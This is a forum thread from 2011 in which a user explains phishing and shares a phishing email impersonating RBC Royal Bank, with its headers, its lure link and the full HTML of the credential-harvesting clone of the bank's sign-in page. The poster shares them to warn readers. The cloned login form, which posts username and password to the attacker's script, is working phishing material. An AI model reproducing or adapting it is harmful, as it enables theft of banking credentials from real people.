|
Post by kas on Jan 12, 2011 11:59:50 GMT -5
|
|
|
Post by kas on Aug 23, 2011 15:56:02 GMT -5
I just got a new phishing email today. What is phishing?
"Phishing" is a popular scam where someone tricks a user into providing his username and password or other personal information to commit identity theft. The most common requested information is a Social Security number, bank account number, PIN number, credit card number, or mother's maiden name.
In many cases, phishers creates an official-looking web page that asks for this information. Users will often receive a link to this phishing page via an email from an official-looking (but likely forged) address. Given the nature of the web, it's easy to stumble upon these fraudulent websites by following links that you find in your email, on the web, or in IM messages.First time ever it was actually for a bank that I actually have been at (years ago but still have been): Delivered-To: KAS_nonono@gmail.com Received: by 10.68.50.67 with SMTP id a3cs64305pbo; Tue, 23 Aug 2011 04:20:32 -0700 (PDT) Received: by 10.146.135.12 with SMTP id i12mr3530462yad.33.1314098432124; Tue, 23 Aug 2011 04:20:32 -0700 (PDT) Return-Path: <sysgames@vluu.org> Received: from buster.vluu.org (buster.vluu.org [207.210.78.158]) by mx.google.com with ESMTPS id g15si86401ani.159.2011.08.23.04.20.28 (version=TLSv1/SSLv3 cipher=OTHER); Tue, 23 Aug 2011 04:20:32 -0700 (PDT) Received-SPF: pass (google.com: domain of sysgames@vluu.org designates 207.210.78.158 as permitted sender) client-ip=207.210.78.158; Authentication-Results: mx.google.com; spf=pass (google.com: domain of sysgames@vluu.org designates 207.210.78.158 as permitted sender) smtp.mail=sysgames@vluu.org Received: from sysgames by buster.vluu.org with local (Exim 4.50) id 1Qvp1w-0005Jf-JN for KAS_nonono@gmail.com; Tue, 23 Aug 2011 04:20:28 -0700 To: KAS_nonono@gmail.com Subject: Please verify your account ! From: info@rbc.com <info4920500@royalbank.com> Content-Type: text/html Message-Id: <4e538d00.0f04650a.1d96.19deSMTPIN_ADDED@mx.google.com> Date: Tue, 23 Aug 2011 04:20:28 -0700
<img name="x" src="http://0f9a.rbc.charyen.com/rbc/r.png" border="0" id="x" usemap="#x"> <map name="x" id="x"> <area shape="rect" coords="55,196,208,213" href="http://0f9a.rbc.charyen.com/rbc/r.php?&user=KAS_nonono@gmail.com&x=0f9a" target="_blank"> </map>
Now this is how it looked: Attachments:
|
|
|
Post by kas on Aug 23, 2011 16:37:37 GMT -5
Accidentally visited it when I was trying to look at the WOT rating and it redirected me to the actual phishing page hosted on a Thai site (hxxp://www.royalbank.com.rbc.charyen.com/rbc/index.php?meil=) where it tries to get you to login with your information so it can steal it .. anyway got a picture of that as well (embedded and attached because guests cannot see attachments for security reasons). Here is also the html of the page because I know since I have reported it as a phishing site that that page will be taken down. I do suspect that they are pages on a hijacked site since the main domain itself looks innocent. However it is not English so I don't know what it is. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title> RBC Royal Bank - Sign In to Online Banking</title> <meta name="Identifier" content="IBSIGNIN.HTM;24;ENGLISH;"> <meta name="description" content="Sign in to RBC Royal Bank Online Banking to access your RBC accounts and online services."> <meta name="keywords" content="online banking sign in, rbc, royal bank of canada, rbc financial group">
<link rel="stylesheet" type="text/css" href="index.css" media="all"> </head> <body onfocus="event_onFocusForm();" onblur="event_onBlurForm();" onunload="event_onUnload();">
<a name="top" id="top"></a> <div id="wrapper">
<!-- Header Starts -->
<div class="skipnav"><a href="#skipheadernav">Skip Header Navigation</a></div> <!-- Secure Header Start --> <div id="globalheader" class="clear globalheader-basic globalheader-secure"> <div id="globalheader-logo"> <img src="rbc_royalbank_en.gif" alt="RBC Royal Bank" width="210" height="47"> </div>
<p id="globalheader-links">
<a href="#">RBCRoyalBank.com</a>
| <a href="#" title="Customer Service (opens new window)">Customer Service</a>
| <a href="#" lang="fr">Français</a> </p>
<p id="globalheader-secureinfo"> </p> <p id="globalheader-tools"> <script type="text/javascript" language="JavaScript"> function getCalendarDate() { var months = new Array(13); months[0] = "January"; months[1] = "February"; months[2] = "March"; months[3] = "April"; months[4] = "May"; months[5] = "June"; months[6] = "July"; months[7] = "August"; months[8] = "September"; months[9] = "October"; months[10] = "November"; months[11] = "December"; var now = new Date(); var monthnumber = now.getMonth(); var monthname = months[monthnumber]; var monthday = now.getDate(); var year = now.getYear(); if(year < 2000) { year = year + 1900; } var dateString = monthname + ' ' + monthday + ', ' + year; return dateString; } var calendarDate = getCalendarDate(); document.write('' + calendarDate); </script>
</p> </div>
<!-- Secure Header End --> <div class="skipnavanchor"><a name="skipheadernav" id="skipheadernav"></a></div>
<div id="layout" class="clear layout-110">
<div id="pagetitlearea" class="clear" style="width: 100%;"> <h1 id="homepagetitle">Welcome to Online Banking</h1> </div>
<div id="layout-column-left" style="padding: 0pt 0pt 282px;"> <div class="skipnav"><a href="#skipleftnav">Skip Left Navigation</a></div> <!-- Sign-in Callout Starts --> <div class="callout callout-lightblue-withtitle"><span class="callout-top"><span> </span></span>
<div class="callout-content clear"> <h2>New to Online Banking?</h2> <ul class="bullets-arrow"> <li><a href="#"><strong>Enrol Now!</strong></a></li> <li><a class="bodylink" href="#">Help with Sign In</a></li> <li><a class="bodylink" href="#">Take a Tour</a></li> <li><a class="bodylink" href="#">Personal Online Banking</a></li> <li><a class="bodylink" href="#">Business Online Banking</a></li> </ul>
<div class="divider-dash"> </div> <form name="OtherOnlineMenu1" action="javascript:submitOtherOnlineMenu1();" method="post"> <div style="padding-bottom: 5px;"><label for="OOService"><strong>Other Online Services:</strong></label></div> <div style="padding-bottom: 7px;"> <select id="OOService" name="OOService" style="font-size: 1em; width: 150px;"> <option selected="selected" value="#">Direct Investing</option> <option value="#">DS Online</option> <option value="#">RBC Rewards</option> <option value="#">Insurance</option> <option value="#">Wealth Management</option> <option value="#">Other Services</option> </select> </div> <div style="padding-bottom: 0px;"> <span class="button button-secondary"><span> <button type="submit">Go</button> </span></span> </div> <br> <br>
</form>
</div> <span class="callout-bottom"><span> </span></span> </div> <!-- Sign-in Callout Ends --> </div> <!-- Page Title --> <div id="layout-column-main"> <div class="skipnavanchor"><a name="skipleftnav" id="skipleftnav"></a></div> <div>
<div id="autherr" tabindex="1"> </div> </div> <div id="banner" class="contentframework-container-secondary" style="background-image: url("sign_in_bg.jpg"); background-repeat: no-repeat; background-position: right top; width: 766px; border: 1px solid rgb(197, 206, 225);">
<form name="rbunxcgi" action="1.php" method="POST" autocomplete="off">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr> <td colspan="2" style="padding: 15px 0px 10px 20px;"> <h2 style="margin: 0pt;"><img src="sign_in.gif" alt="Sign In to Online Banking"></h2> </td> </tr> <!--//Sign-In-->
<tr align="left" valign="top"> <td style="width: 170px; padding-left: 25px;"> <label for="K1"><strong>Client Card/Username:</strong></label><br> <p class="subcopy"> <img class="bullet" alt="" src="bullet-link.gif" border="0"> <a href="#" tabindex="5">Forgot Username</a> </p> </td> <td style="width: 190px;"> <div style="width: 350px;"> <input value="" id="K1" name="K1" tabindex="2" class="contentframework-textfield" size="32" maxlength="32" type="text">
<table style="margin-top: 5px;" border="0" cellpadding="0" cellspacing="0" width="100%"> <tbody><tr> <td valign="top"> <input style="float: left; margin-right: 3px; margin-left: 0px;" id="N1" name="N1" tabindex="7" value="" onclick="javascript:if (this.checked) { document.rbunxcgi.NNAME.value='ecatsRememberMe'; } else { document.rbunxcgi.NNAME.value=''; }" type="checkbox"> <span class="subcopy" style="padding-top: 3px;"></span> </td> <td class="subcopy" valign="top" width="100%"> <label for="N1">Remember My Client Card/Username</label> <br> <img src="bullet-link.gif" alt="" class="bullet" border="0"> <a class="linkedtextandicon" href="#" title="Learn More about Remember My Client Card/Username (opens new window)" tabindex="8"> <span>Learn More</span> <img src="newwindow.gif" alt="(opens new window)" class="icon"> </a> </td> </tr> </tbody></table> </div> <!--//Right Div top--> </td> </tr>
<tr align="left" valign="top"> <td style="clear: left; width: 170px; padding-left: 25px; padding-top: 10px;"> <label for="Q1"><strong>Password:</strong></label><br> <p class="subcopy"> <img class="bullet" alt="" src="bullet-link.gif" border="0"> <a href="#" tabindex="6">Forgot Password</a> </p> </td>
<td style="width: 500px; padding-top: 10px;"> <input id="Q1" name="Q1" class="contentframework-textfield" style="float: left; margin-right: 5px;" tabindex="3" onfocus="EnterOn=true;" onblur="EnterOn=false;" type="password"> <span class="button button-primary" style="float: left;"><span><button type="submit" tabindex="4">Sign In <img src="chevron.gif" alt="" width="12" height="12"></button></span></span> </td> </tr> </tbody></table>
</form> </div> <!--//Banner-->
<div style="clear: left; width: 540px; float: left; padding-right: 12px;"> <div class="homepagelinkgrid" style="vertical-align: top;"> <div class="clear"> <div class="homepagelinkgrid-block" style="width: auto; padding-top: 0px;"> <h2>In the Spotlight</h2> <ul class="bullets-arrow"><li><a class="linkedtextandicon" href="#"><span>New Online Banking Sign In Page Now Active</span> <img src="newwindow.gif" alt="(opens new window)" class="icon"></a></li> <li><a href="#">Stay safe online during the holidays</a></li> <li><a class="linkedtextandicon" href="#"><span>New online tools can help RBC Direct Investing’s clients reach their investment goals</span> <img src="newwindow.gif" alt="(opens new window)" class="icon"></a></li> <li><a href="#">Write an Online Banking Review</a></li> </ul> </div> </div> <div class="divider-gradient" style="vertical-align: bottom;"> </div> </div> <!-- MKTSPACEPT.INC ends --> <div style="padding-top: 3px;"> <a href="#"> <img src="untitled" alt="Advertisement - Select for more information" border="0" width="540" height="120"></a> </div>
</div> <!--//Left-->
<div style="float: right;"> <a href="#"><img src="rbc_sec_guarantee.gif" alt="RBC Security Guarantee. 100% Reimbursement for unauthorized transactions in RBC Online Banking. Learn More."></a> </div> <!--//Right--> </div> <!--//layout-column-main-->
</div> <!--//Layout-->
<!-- Global Footer Starts --> <div id="globalfooter-main" class="OLBAlternatable"> <p>Royal Bank of Canada Website, В© 1995-2010</p> <p id="globalfooter-tool-line1"> </p> <p> <a href="#" title="Privacy & Security (opens new window)">Privacy & Security</a> | <a href="#" title="Legal (opens new window)">Legal</a> | <a href="#" title="Accessibility (opens new window)">Accessibility</a></p> <p id="globalfooter-tool-line2"> <span class="globalfooter-tool" id="tool-totop"><a href="#top" class="linkedtextandicon"><span>To Top</span> <img src="totopbutton.gif" alt="To Top" width="16" height="16"></a></span> </p> </div> <!-- Global Footer Ends -->
<img src="untitled_001.dat" alt="" border="0" width="1" height="1">
</div>
<span id="remotingDiv"></span></body> </html>
Attachments:
|
|
|
Post by kas on Aug 23, 2011 17:52:42 GMT -5
|
|